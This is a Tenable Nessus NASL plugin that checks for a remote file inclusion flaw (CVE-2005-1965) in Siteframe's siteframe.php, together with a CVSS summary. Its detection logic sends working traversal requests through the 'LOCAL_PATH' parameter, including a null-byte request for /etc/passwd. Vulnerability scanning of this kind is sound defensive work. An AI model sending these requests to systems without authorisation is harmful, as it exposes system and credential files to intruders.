CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
Percentile
92.2%
The remote host is running Siteframe, an open source content management system using PHP and MySQL.
The installed version of Siteframe does not properly sanitize the ‘LOCAL_PATH’ parameter of the ‘siteframe.php’ script before using it to include files. By leveraging this flaw, an attacker is able to view arbitrary files on the remote host and even execute arbitrary PHP code, possibly taken from third-party hosts.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(18460);
script_version("1.20");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2005-1965");
script_bugtraq_id(13928);
script_name(english:"Siteframe siteframe.php LOCAL_PATH Parameter Remote File Inclusion");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to a remote
file include attack.");
script_set_attribute(attribute:"description", value:
"The remote host is running Siteframe, an open source content
management system using PHP and MySQL.
The installed version of Siteframe does not properly sanitize the
'LOCAL_PATH' parameter of the 'siteframe.php' script before using it
to include files. By leveraging this flaw, an attacker is able to
view arbitrary files on the remote host and even execute arbitrary PHP
code, possibly taken from third-party hosts.");
# http://web.archive.org/web/20061017041521/http://securitytracker.com/alerts/2005/Jun/1014150.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?034b19ae");
# http://web.archive.org/web/20070908174320/http://v3.siteframe.org/document.php?id=483
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?80d659bd");
script_set_attribute(attribute:"solution", value:
"Patch 'siteframe.php' as suggested in the project document referenced
above.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_cwe_id(94);
script_set_attribute(attribute:"vuln_publication_date", value:"2005/06/10");
script_set_attribute(attribute:"plugin_publication_date", value:"2005/06/10");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:glen_campbell:siteframe");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_require_keys("www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
# For each CGI directory...
foreach dir (cgi_dirs()) {
# Try to exploit the flaw to read a file included in the distribution.
w = http_send_recv3(method:"GET",
item:string(
dir, "/siteframe.php?",
"LOCAL_PATH=macros/100-siteframe.macro%00"
),
port:port
);
if (isnull(w)) exit(1, "The web server did not answer");
res = w[2];
# There's a problem if it looks like the file.
if ("{!# Siteframe Macro Library" >< res) {
security_hole(port);
exit(0);
}
if ( thorough_tests )
{
# If that failed, try to grab /etc/passwd.
w = http_send_recv3(method:"GET",
item:string(
dir, "/siteframe.php?",
"LOCAL_PATH=/etc/passwd%00"
),
port:port
);
if (isnull(w)) exit(1, "The web server did not answer");
res = w[2];
# There's a problem if there's an entry for root.
if (egrep(string:res, pattern:"root:.+:0:")) {
security_hole(port);
exit(0);
}
}
}